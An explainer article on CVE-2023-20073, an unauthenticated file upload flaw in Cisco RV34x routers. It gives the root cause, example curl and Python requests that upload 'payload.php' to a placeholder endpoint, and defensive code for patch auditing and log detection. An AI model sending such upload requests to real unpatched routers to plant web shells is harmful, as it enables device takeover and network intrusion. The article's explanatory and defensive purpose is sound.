CVE-2023-20073 - Cisco Dual WAN VPN Routers Arbitrary File Upload Vulnerability Explained
CVE-2023-20073 is a high-severity security vulnerability found in several business-grade Cisco routers—specifically the RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers. This flaw allows unauthenticated, remote attackers to upload files on the router without logging in. If exploited successfully, an attacker could upload malicious files, potentially taking over the device and compromising an entire network.
In this exclusive long-read, we’ll break down how the vulnerability works in plain English. We'll look at sample exploit requests, how attackers abuse this weakness, and what you should do to protect your network. Links to original advisories and technical references are also included.
The Root Cause
The problem lies in the web-based management interface of affected Cisco routers. Normally, when a user uploads files (such as new firmware or config backups), the router should check if the user is logged in and has admin rights.
With this flaw, the device doesn’t properly enforce these checks. The file upload logic can be reached and used by anyone over the network, even if they’re not logged in!
Cisco's official description of the bug:
- Cisco Security Advisory for CVE-2023-20073
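To make the root cause concrete, here is an added illustration of the bug class (not Cisco's code, and no part of the original write-up): a minimal upload handler that never checks for an authenticated admin session, next to a hardened version that rejects the request before any byte is stored. All names (`Session`, `Request`, `SESSIONS`, `UPLOAD_DIR`, the `sessionid` cookie and the `X-Filename` header) are assumptions made up for the example.

```python
"""Hypothetical illustration of the bug class behind CVE-2023-20073:
an upload handler reachable without an authenticated admin session,
next to a hardened version. Constructed example, not Cisco's code."""
from dataclasses import dataclass, field
from typing import Dict, Optional


@dataclass
class Session:
    user: str
    role: str  # "admin" or "viewer"


@dataclass
class Request:
    method: str
    path: str
    headers: Dict[str, str] = field(default_factory=dict)
    body: bytes = b""


# Constructed in-memory session table (a real device keeps this server-side).
SESSIONS: Dict[str, Session] = {
    "s3ss10n-admin": Session("admin", "admin"),
    "s3ss10n-view": Session("guest", "viewer"),
}
UPLOAD_DIR: Dict[str, bytes] = {}  # stands in for the device filesystem


def lookup_session(request: Request) -> Optional[Session]:
    """Resolve the (assumed) sessionid cookie to a server-side session record."""
    cookie = request.headers.get("Cookie", "")
    for part in cookie.split(";"):
        name, _, value = part.strip().partition("=")
        if name == "sessionid" and value in SESSIONS:
            return SESSIONS[value]
    return None


def store_upload(request: Request) -> int:
    """Write the body under the client-supplied filename: the privileged action."""
    filename = request.headers.get("X-Filename", "upload.bin")
    UPLOAD_DIR[filename] = request.body
    return 200


def vulnerable_upload(request: Request) -> int:
    """Bug class from the advisory: the handler never asks who is calling,
    so any network peer that can reach the path can write a file."""
    if request.method != "POST":
        return 405
    return store_upload(request)


def hardened_upload(request: Request) -> int:
    """Fix: authenticate and authorise before reaching the upload logic.
    A missing session is 401, a non-admin session is 403."""
    if request.method != "POST":
        return 405
    session = lookup_session(request)
    if session is None:
        return 401
    if session.role != "admin":
        return 403
    return store_upload(request)


def demo() -> dict:
    """Send the same unauthenticated request through both handlers."""
    anon = Request("POST", "/upload", {"X-Filename": "payload.php"}, b"constructed bytes")
    UPLOAD_DIR.clear()
    vuln = (vulnerable_upload(anon), "payload.php" in UPLOAD_DIR)
    UPLOAD_DIR.clear()
    hard = (hardened_upload(anon), "payload.php" in UPLOAD_DIR)
    return {"vulnerable": vuln, "hardened": hard}


if __name__ == "__main__":
    print(demo())  # {'vulnerable': (200, True), 'hardened': (401, False)}
```

The point of the hardened version is ordering: the session lookup and role check happen before the upload code is reachable at all, which is exactly the check the affected firmware failed to enforce.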
How Is It Exploited?
The attack can be carried out simply by sending a crafted HTTP POST request to the router’s web interface—no authentication, no login required!
Example Vulnerable Endpoint
In many Cisco RV routers, the file upload functionality is reachable via URLs like:
- `http://<router_ip>/upload`
- `http://<router_ip>/cgi-bin/webproc`
- or similar /cgi-bin/ web forms.
Exploit in Practice: HTTP Multipart POST Request
Below is a demonstration of how an attacker might upload a file using curl or Python.
_curl Example:_

```bash
curl -k -X POST \
  -F "file=@payload.php" \
  http://192.168.1.1/cgi-bin/vulnerable_upload_endpoint
```
_Python Example (using requests):_

```python
import requests

url = "http://192.168.1.1/cgi-bin/vulnerable_upload_endpoint"
# Open the file in a context manager so the handle is closed after the request
with open("payload.php", "rb") as f:
    files = {"file": f}
    r = requests.post(url, files=files)
print(r.status_code)
print(r.text)
```
> NOTE: In real attacks, “payload.php” could be any malicious script, web shell, or binary.
Impact—What Can Go Wrong?
- Remote Code Execution: Uploaded files could contain scripts that let an attacker execute arbitrary code or commands on the router
- Persistence: Attackers could plant backdoors and stay inside your network, even after reboots
- Network Breach: Since routers see all your traffic, attackers could snoop, redirect, or manipulate your connections
If your router is directly exposed to the Internet, the risk is severe—bots and attackers constantly scan for unpatched devices.
Fixes and Recommendations
Cisco patched this vulnerability in firmware release 1.0.03.29 (and later) for all affected models.
Update your router's firmware ASAP!
Official firmware and upgrade instructions are on the Cisco RV34X Series Routers support downloads page (listed in the references below).
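As an added helper (not from the original write-up or from Cisco), the following script compares the firmware version each affected router reports against the fixed release named above. Versions such as `1.0.03.29` must be compared field by field as integers, not as strings, or `1.0.03.9` would sort after `1.0.03.29`. The inventory rows are constructed sample data; how you collect the running version from your devices is assumed to be handled elsewhere.

```python
"""Added check: flag affected Cisco RV34x routers whose firmware predates
the fixed release 1.0.03.29. Constructed example; inventory data is made up."""
from typing import List, Tuple

FIXED_RELEASE = "1.0.03.29"  # first fixed firmware named in the write-up
AFFECTED_MODELS = {"RV340", "RV340W", "RV345", "RV345P"}


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn '1.0.03.29' into (1, 0, 3, 29) so fields compare numerically."""
    parts = version.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"unparseable firmware version: {version!r}")
    return tuple(int(p) for p in parts)


def is_vulnerable(model: str, version: str) -> bool:
    """True when the model is affected and its firmware is older than the fix."""
    if model.upper() not in AFFECTED_MODELS:
        return False
    return parse_version(version) < parse_version(FIXED_RELEASE)


def audit(inventory: List[Tuple[str, str, str]]) -> List[str]:
    """Return hostnames still needing the patch, from (host, model, version) rows."""
    return [host for host, model, ver in inventory if is_vulnerable(model, ver)]


# Constructed inventory for the demo (hostnames and versions are made up)
SAMPLE_INVENTORY = [
    ("branch-a-rtr", "RV345", "1.0.03.28"),
    ("branch-b-rtr", "RV340W", "1.0.03.29"),
    ("branch-c-rtr", "RV345P", "1.0.03.30"),
    ("lab-rtr", "SOME-OTHER-MODEL", "1.0.01.05"),
]

if __name__ == "__main__":
    print(audit(SAMPLE_INVENTORY))  # ['branch-a-rtr']
```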
References & Original Advisories
- Cisco Security Advisory for CVE-2023-20073
- NIST National Vulnerability Database Entry
- Cisco RV34X Series Routers – Support Downloads
Conclusion
CVE-2023-20073 is a classic web application bug—missing access control checks on file uploads. Attackers can (and do) exploit these flaws to quickly compromise unpatched business routers, placing entire offices at risk.
Patch ASAP, limit admin interface exposure, and review your router’s logs for suspicious uploads or logins. Take router vulnerabilities as seriously as PC or server flaws—often, they’re the entry point to your whole organization.
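To turn the "review your router's logs" advice into something repeatable, here is an added example (not part of the original write-up) that scans access-style log lines for accepted POSTs to the upload paths named above and flags those that came from outside the trusted management ranges or carried no session cookie. The log format, the `cookie=yes|no` field, the trusted networks and every line in `SAMPLE_LOG` are constructed assumptions; a real RV34x log will look different and needs its own regex.

```python
"""Added detection example: flag accepted upload POSTs that look
unauthenticated or external. Log format and sample lines are constructed."""
import ipaddress
import re
from typing import Dict, List, Optional

# Constructed log format (assumption, not the router's real one):
# <client_ip> <method> <path> <status> <content-type> cookie=<yes|no>
LINE_RE = re.compile(
    r"^(?P<ip>\S+) (?P<method>[A-Z]+) (?P<path>\S+) (?P<status>\d{3}) "
    r"(?P<ctype>\S+) cookie=(?P<cookie>yes|no)$"
)
# Upload paths named in the write-up; /cgi-bin/ covers the "similar web forms" case.
UPLOAD_PATHS = re.compile(r"^(?:/upload|/cgi-bin/)")
# Assumption: management traffic should only ever originate from these ranges.
TRUSTED_NETS = [ipaddress.ip_network("192.168.0.0/16"), ipaddress.ip_network("10.0.0.0/8")]

# Constructed sample log; 203.0.113.0/24 is a documentation range, not a real host.
SAMPLE_LOG = """\
192.168.1.50 GET /login 200 text/html cookie=no
192.168.1.50 POST /cgi-bin/webproc 200 multipart/form-data cookie=yes
203.0.113.77 POST /upload 200 multipart/form-data cookie=no
203.0.113.77 POST /cgi-bin/webproc 200 application/x-www-form-urlencoded cookie=no
192.168.1.51 POST /upload 200 multipart/form-data cookie=no
192.168.1.52 POST /cgi-bin/webproc 401 multipart/form-data cookie=no
"""


def is_trusted(ip: str) -> bool:
    """True when the source address falls inside an assumed management range."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in TRUSTED_NETS)


def classify(line: str) -> Optional[Dict[str, object]]:
    """Return a finding for an accepted upload POST that looks unauthenticated
    or external; None for everything else (including rejected attempts)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    if d["method"] != "POST" or not UPLOAD_PATHS.match(d["path"]):
        return None
    if not d["status"].startswith("2"):
        return None  # the device rejected it; track separately if you count attempts
    reasons: List[str] = []
    if not is_trusted(d["ip"]):
        reasons.append("external source")
    if d["cookie"] == "no":
        reasons.append("no session cookie")
    if not reasons:
        return None
    return {"ip": d["ip"], "path": d["path"], "reasons": reasons}


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Run classify() over every line and collect the findings in order."""
    findings: List[Dict[str, object]] = []
    for line in lines:
        finding = classify(line.rstrip("\n"))
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f"{f['ip']} POST {f['path']}: {', '.join(f['reasons'])}")
```

An accepted upload with no session cookie is the signature of this bug class regardless of source address, so the internal hit on `/upload` is flagged too; the external hits are the ones to treat as probable compromise rather than misconfiguration.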
Timeline
Published on: 04/05/2023 16:15:00 UTC
Last modified on: 04/11/2023 19:16:00 UTC